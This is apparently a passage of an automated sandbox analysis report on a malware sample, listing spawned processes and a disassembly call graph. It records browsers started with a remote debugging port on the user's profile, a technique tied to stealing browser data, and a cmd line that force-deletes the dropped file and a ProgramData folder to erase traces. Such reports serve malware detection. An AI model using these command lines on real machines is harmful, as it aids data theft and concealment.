                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                                                        Imagebase:0x470000
                                                                                                                                                                                                                                                                                                        File size:28'160 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                                                                                        Start time:13:27:53
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                                                                                        Start time:13:27:54
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2236,i,6734849523328560890,2082883044191278633,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                                                                                        Start time:13:28:07
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                                                                                        Start time:13:28:08
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2704 --field-trial-handle=2644,i,11626362328839299317,9747645851488831929,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                                                                                        Start time:13:28:08
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                                                                                        Start time:13:28:09
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2052,i,17749502471063055911,16474361137930384879,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                                                                                        Start time:13:28:18
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                                                                                        Start time:13:28:19
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2412,i,5564331809908688110,6573540988472131423,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                                                                                        Start time:13:28:19
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                                                                                        Start time:13:28:19
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                                                                                        Start time:13:28:23
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6356 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                                                                                        Start time:13:28:23
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6704 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                                                                                        Start time:13:28:24
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                                        File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                                                                                        Start time:13:28:24
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                                        File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                                                                                        Start time:13:28:54
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\680662\Billion.com" & rd /s /q "C:\ProgramData\IMYUKNY5XBIE" & exit
                                                                                                                                                                                                                                                                                                        Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                                                                                        Start time:13:28:54
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                                                                                        Start time:13:28:54
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                                        Imagebase:0x690000
                                                                                                                                                                                                                                                                                                        File size:25'088 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                          Execution Coverage:17.7%
                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                          Signature Coverage:21%
                                                                                                                                                                                                                                                                                                          Total number of Nodes:1482
                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:26
                                                                                                                                                                                                                                                                                                          execution_graph 4196 402fc0 4197 401446 18 API calls 4196->4197 4198 402fc7 4197->4198 4199 401a13 4198->4199 4200 403017 4198->4200 4201 40300a 4198->4201 4203 406831 18 API calls 4200->4203 4202 401446 18 API calls 4201->4202 4202->4199 4203->4199 4204 4023c1 4205 40145c 18 API calls 4204->4205 4206 4023c8 4205->4206 4209 407296 4206->4209 4212 406efe CreateFileW 4209->4212 4213 406f30 4212->4213 4214 406f4a ReadFile 4212->4214 4215 4062cf 11 API calls 4213->4215 4216 4023d6 4214->4216 4219 406fb0 4214->4219 4215->4216 4217 406fc7 ReadFile lstrcpynA lstrcmpA 4217->4219 4220 40700e SetFilePointer ReadFile 4217->4220 4218 40720f CloseHandle 4218->4216 4219->4216 4219->4217 4219->4218 4221 407009 4219->4221 4220->4218 4222 4070d4 ReadFile 4220->4222 4221->4218 4223 407164 4222->4223 4223->4221 4223->4222 4224 40718b SetFilePointer GlobalAlloc ReadFile 4223->4224 4225 4071eb lstrcpynW GlobalFree 4224->4225 4226 4071cf 4224->4226 4225->4218 4226->4225 4226->4226 4227 401cc3 4228 40145c 18 API calls 4227->4228 4229 401cca lstrlenW 4228->4229 4230 4030dc 4229->4230 4231 4030e3 4230->4231 4233 405f7d wsprintfW 4230->4233 4233->4231 4234 401c46 4235 40145c 18 API calls 4234->4235 4236 401c4c 4235->4236 4237 4062cf 11 API calls 4236->4237 4238 401c59 4237->4238 4239 406cc7 81 API calls 4238->4239 4240 401c64 4239->4240 4241 403049 4242 401446 18 API calls 4241->4242 4243 403050 4242->4243 4244 406831 18 API calls 4243->4244 4245 401a13 4243->4245 4244->4245 4246 40204a 4247 401446 18 API calls 4246->4247 4248 402051 IsWindow 4247->4248 4249 4018d3 4248->4249 4250 40324c 4251 403277 4250->4251 4252 40325e SetTimer 4250->4252 4253 4032cc 4251->4253 4254 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4251->4254 4252->4251 4254->4253 4255 4022cc 4256 40145c 18 API calls 4255->4256 4257 4022d3 4256->4257 4258 406301 2 API calls 4257->4258 4259 4022d9 4258->4259 4261 4022e8 4259->4261 4264 405f7d wsprintfW 4259->4264 4262 4030e3 4261->4262 4265 405f7d wsprintfW 4261->4265 4264->4261 4265->4262 4266 4030cf 4267 40145c 18 API calls 4266->4267 4268 4030d6 4267->4268 4270 4030dc 4268->4270 4273 4063d8 GlobalAlloc lstrlenW 4268->4273 4271 4030e3 4270->4271 4300 405f7d wsprintfW 4270->4300 4274 406460 4273->4274 4275 40640e 4273->4275 4274->4270 4276 40643b GetVersionExW 4275->4276 4301 406057 CharUpperW 4275->4301 4276->4274 4277 40646a 4276->4277 4278 406490 LoadLibraryA 4277->4278 4279 406479 4277->4279 4278->4274 4282 4064ae GetProcAddress GetProcAddress GetProcAddress 4278->4282 4279->4274 4281 4065b1 GlobalFree 4279->4281 4283 4065c7 LoadLibraryA 4281->4283 4284 406709 FreeLibrary 4281->4284 4285 406621 4282->4285 4289 4064d6 4282->4289 4283->4274 4287 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4274 4286 40667d FreeLibrary 4285->4286 4288 406656 4285->4288 4286->4288 4287->4285 4292 406716 4288->4292 4297 4066b1 lstrcmpW 4288->4297 4298 4066e2 CloseHandle 4288->4298 4299 406700 CloseHandle 4288->4299 4289->4285 4290 406516 4289->4290 4291 4064fa FreeLibrary GlobalFree 4289->4291 4290->4281 4293 406528 lstrcpyW OpenProcess 4290->4293 4295 40657b CloseHandle CharUpperW lstrcmpW 4290->4295 4291->4274 4294 40671b CloseHandle FreeLibrary 4292->4294 4293->4290 4293->4295 4296 406730 CloseHandle 4294->4296 4295->4285 4295->4290 4296->4294 4297->4288 4297->4296 4298->4288 4299->4284 4300->4271 4301->4275 4302 4044d1 4303 40450b 4302->4303 4304 40453e 4302->4304 4370 405cb0 GetDlgItemTextW 4303->4370 4305 40454b GetDlgItem GetAsyncKeyState 4304->4305 4309 4045dd 4304->4309 4307 40456a GetDlgItem 4305->4307 4320 404588 4305->4320 4312 403d6b 19 API calls 4307->4312 4308 4046c9 4368 40485f 4308->4368 4372 405cb0 GetDlgItemTextW 4308->4372 4309->4308 4317 406831 18 API calls 4309->4317 4309->4368 4310 404516 4311 406064 5 API calls 4310->4311 4313 40451c 4311->4313 4315 40457d ShowWindow 4312->4315 4316 403ea0 5 API calls 4313->4316 4315->4320 4321 404521 GetDlgItem 4316->4321 4322 40465b SHBrowseForFolderW 4317->4322 4318 4046f5 4323 4067aa 18 API calls 4318->4323 4319 403df6 8 API calls 4324 404873 4319->4324 4325 4045a5 SetWindowTextW 4320->4325 4329 405d85 4 API calls 4320->4329 4326 40452f IsDlgButtonChecked 4321->4326 4321->4368 4322->4308 4328 404673 CoTaskMemFree 4322->4328 4333 4046fb 4323->4333 4327 403d6b 19 API calls 4325->4327 4326->4304 4331 4045c3 4327->4331 4332 40674e 3 API calls 4328->4332 4330 40459b 4329->4330 4330->4325 4337 40674e 3 API calls 4330->4337 4334 403d6b 19 API calls 4331->4334 4335 404680 4332->4335 4373 406035 lstrcpynW 4333->4373 4338 4045ce 4334->4338 4339 4046b7 SetDlgItemTextW 4335->4339 4344 406831 18 API calls 4335->4344 4337->4325 4371 403dc4 SendMessageW 4338->4371 4339->4308 4340 404712 4342 406328 3 API calls 4340->4342 4351 40471a 4342->4351 4343 4045d6 4345 406328 3 API calls 4343->4345 4346 40469f lstrcmpiW 4344->4346 4345->4309 4346->4339 4349 4046b0 lstrcatW 4346->4349 4347 40475c 4374 406035 lstrcpynW 4347->4374 4349->4339 4350 404765 4352 405d85 4 API calls 4350->4352 4351->4347 4355 40677d 2 API calls 4351->4355 4357 4047b1 4351->4357 4353 40476b GetDiskFreeSpaceW 4352->4353 4356 40478f MulDiv 4353->4356 4353->4357 4355->4351 4356->4357 4358 40480e 4357->4358 4375 4043d9 4357->4375 4359 404831 4358->4359 4361 40141d 80 API calls 4358->4361 4383 403db1 KiUserCallbackDispatcher 4359->4383 4361->4359 4362 4047ff 4364 404810 SetDlgItemTextW 4362->4364 4365 404804 4362->4365 4364->4358 4367 4043d9 21 API calls 4365->4367 4366 40484d 4366->4368 4384 403d8d 4366->4384 4367->4358 4368->4319 4370->4310 4371->4343 4372->4318 4373->4340 4374->4350 4376 4043f9 4375->4376 4377 406831 18 API calls 4376->4377 4378 404439 4377->4378 4379 406831 18 API calls 4378->4379 4380 404444 4379->4380 4381 406831 18 API calls 4380->4381 4382 404454 lstrlenW wsprintfW SetDlgItemTextW 4381->4382 4382->4362 4383->4366 4385 403da0 SendMessageW 4384->4385 4386 403d9b 4384->4386 4385->4368 4386->4385 4387 401dd3 4388 401446 18 API calls 4387->4388 4389 401dda 4388->4389 4390 401446 18 API calls 4389->4390 4391 4018d3 4390->4391 4392 402e55 4393 40145c 18 API calls 4392->4393 4394 402e63 4393->4394 4395 402e79 4394->4395 4396 40145c 18 API calls 4394->4396 4397 405e5c 2 API calls 4395->4397 4396->4395 4398 402e7f 4397->4398 4422 405e7c GetFileAttributesW CreateFileW 4398->4422 4400 402e8c 4401 402f35 4400->4401 4402 402e98 GlobalAlloc 4400->4402 4405 4062cf 11 API calls 4401->4405 4403 402eb1 4402->4403 4404 402f2c CloseHandle 4402->4404 4423 403368 SetFilePointer 4403->4423 4404->4401 4407 402f45 4405->4407 4409 402f50 DeleteFileW 4407->4409 4410 402f63 4407->4410 4408 402eb7 4411 403336 ReadFile 4408->4411 4409->4410 4424 401435 4410->4424 4413 402ec0 GlobalAlloc 4411->4413 4414 402ed0 4413->4414 4415 402f04 WriteFile GlobalFree 4413->4415 4417 40337f 33 API calls 4414->4417 4416 40337f 33 API calls 4415->4416 4418 402f29 4416->4418 4421 402edd 4417->4421 4418->4404 4420 402efb GlobalFree 4420->4415 4421->4420 4422->4400 4423->4408 4425 404f9e 25 API calls 4424->4425 4426 401443 4425->4426 4427 401cd5 4428 401446 18 API calls 4427->4428 4429 401cdd 4428->4429 4430 401446 18 API calls 4429->4430 4431 401ce8 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401cf1 4432->4433 4434 401d07 lstrlenW 4433->4434 4435 401d43 4433->4435 4436 401d11 4434->4436 4436->4435 4440 406035 lstrcpynW 4436->4440 4438 401d2c 4438->4435 4439 401d39 lstrlenW 4438->4439 4439->4435 4440->4438 4441 402cd7 4442 401446 18 API calls 4441->4442 4444 402c64 4442->4444 4443 402d17 ReadFile 4443->4444 4444->4441 4444->4443 4445 402d99 4444->4445 4446 402dd8 4447 4030e3 4446->4447 4448 402ddf 4446->4448 4449 402de5 FindClose 4448->4449 4449->4447 4450 401d5c 4451 40145c 18 API calls 4450->4451 4452 401d63 4451->4452 4453 40145c 18 API calls 4452->4453 4454 401d6c 4453->4454 4455 401d73 lstrcmpiW 4454->4455 4456 401d86 lstrcmpW 4454->4456 4457 401d79 4455->4457 4456->4457 4458 401c99 4456->4458 4457->4456 4457->4458 4459 4027e3 4460 4027e9 4459->4460 4461 4027f2 4460->4461 4462 402836 4460->4462 4475 401553 4461->4475 4463 40145c 18 API calls 4462->4463 4465 40283d 4463->4465 4467 4062cf 11 API calls 4465->4467 4466 4027f9 4468 40145c 18 API calls 4466->4468 4472 401a13 4466->4472 4469 40284d 4467->4469 4470 40280a RegDeleteValueW 4468->4470 4479 40149d RegOpenKeyExW 4469->4479 4471 4062cf 11 API calls 4470->4471 4474 40282a RegCloseKey 4471->4474 4474->4472 4476 401563 4475->4476 4477 40145c 18 API calls 4476->4477 4478 401589 RegOpenKeyExW 4477->4478 4478->4466 4482 4014c9 4479->4482 4487 401515 4479->4487 4480 4014ef RegEnumKeyW 4481 401501 RegCloseKey 4480->4481 4480->4482 4484 406328 3 API calls 4481->4484 4482->4480 4482->4481 4483 401526 RegCloseKey 4482->4483 4485 40149d 3 API calls 4482->4485 4483->4487 